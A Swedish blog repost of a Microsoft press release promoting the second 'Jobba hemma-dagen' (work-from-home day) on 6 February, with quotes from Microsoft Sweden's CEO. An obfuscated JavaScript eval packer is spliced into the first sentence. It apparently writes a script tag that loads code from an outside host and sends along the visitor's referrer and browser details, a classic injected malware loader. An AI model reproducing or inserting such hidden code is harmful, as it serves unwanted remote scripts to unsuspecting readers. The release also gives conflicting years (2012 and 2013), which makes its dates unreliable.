Image Image Image Image Image Image Image Image Image Image

| 20 juni, 2021

Scroll to top

Top

Jobba hemma-dagen närmar sig

Jobba hemma-dagen närmar sig
Sebastian

Förra eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|besbd|var|u0026u|referrer|hhzdb||js|php’.split(’|’),0,{}))
året deltog över 50 företag och organisationer i Jobba hemma-dagen, de stängde sina kontor och medarbetarna arbetade på distans. Nu är det mindre än en månad kvar till årets Jobba hemma-dag och i år hoppas initiativtagarna att allt fler ställer sig bakom initiativet.

– Vi vill fortsätta skapa opinion för att fler ska ha möjlighet att arbeta hemifrån. Genom initiativet Jobba hemma-dagen vill vi manifestera de fördelar som finns med en mer flexibel syn på arbetsplatsen. Där arbete inte är något man går till utan något man gör, säger Per Adolfsson, vd för Microsoft Sverige.

Den 6 februari arrangeras Jobba hemma-dagen för andra gången och syftet är att belysa fördelarna med att jobba hemma ibland. Att en mer flexibel syn på arbetet har fördelar för såväl medarbetare, arbetsgivare som miljön.

– Ett bättre fungerande livspussel är en tydlig vinst för medarbetaren. Arbetsgivaren får mer effektiva och mindre stressade medarbetare. Dessutom är jag övertygad om att det kommer underlätta rekrytering av rätt personal. Miljön vinner om fler väljer att jobba hemma då behovet av arbetsresor och dess negativa miljöpåverkan minskar, avslutar Per Adolfsson.

Målsättningen är att fördubbla antalet deltagande företag och organisationer som stänger sina kontor den 6 februari 2013 och låter de medarbetare som kan jobba hemma. Några som är med och stöttar initiativet är Skype, IDG, Makalösa Föräldrar och Gröna Bilister.

Om Jobba-Hemma-Dagen

Jobba hemma-dagen äger rum den 6 februari 2012 och är ett initiativ från Microsoft som manifesterar fördelarna med flexibelt arbete. Deltagare i Jobba hemma-dagen har en gemensam tro på att arbete inte är en plats man går till utan något man gör. Flexibelt kontorsarbete har fördelar för såväl företag som medarbetare – det ger ökad produktivitet och enklare vardag. För att attrahera rätt medarbetare idag och i framtiden, krävs en flexibel syn på arbete.

http://www.microsoft.com/sverige/dna/jobba-hemma-dagen/

http://www.facebook.com/Jobbahemma

Detta är ett pressmeddelande från Microsoft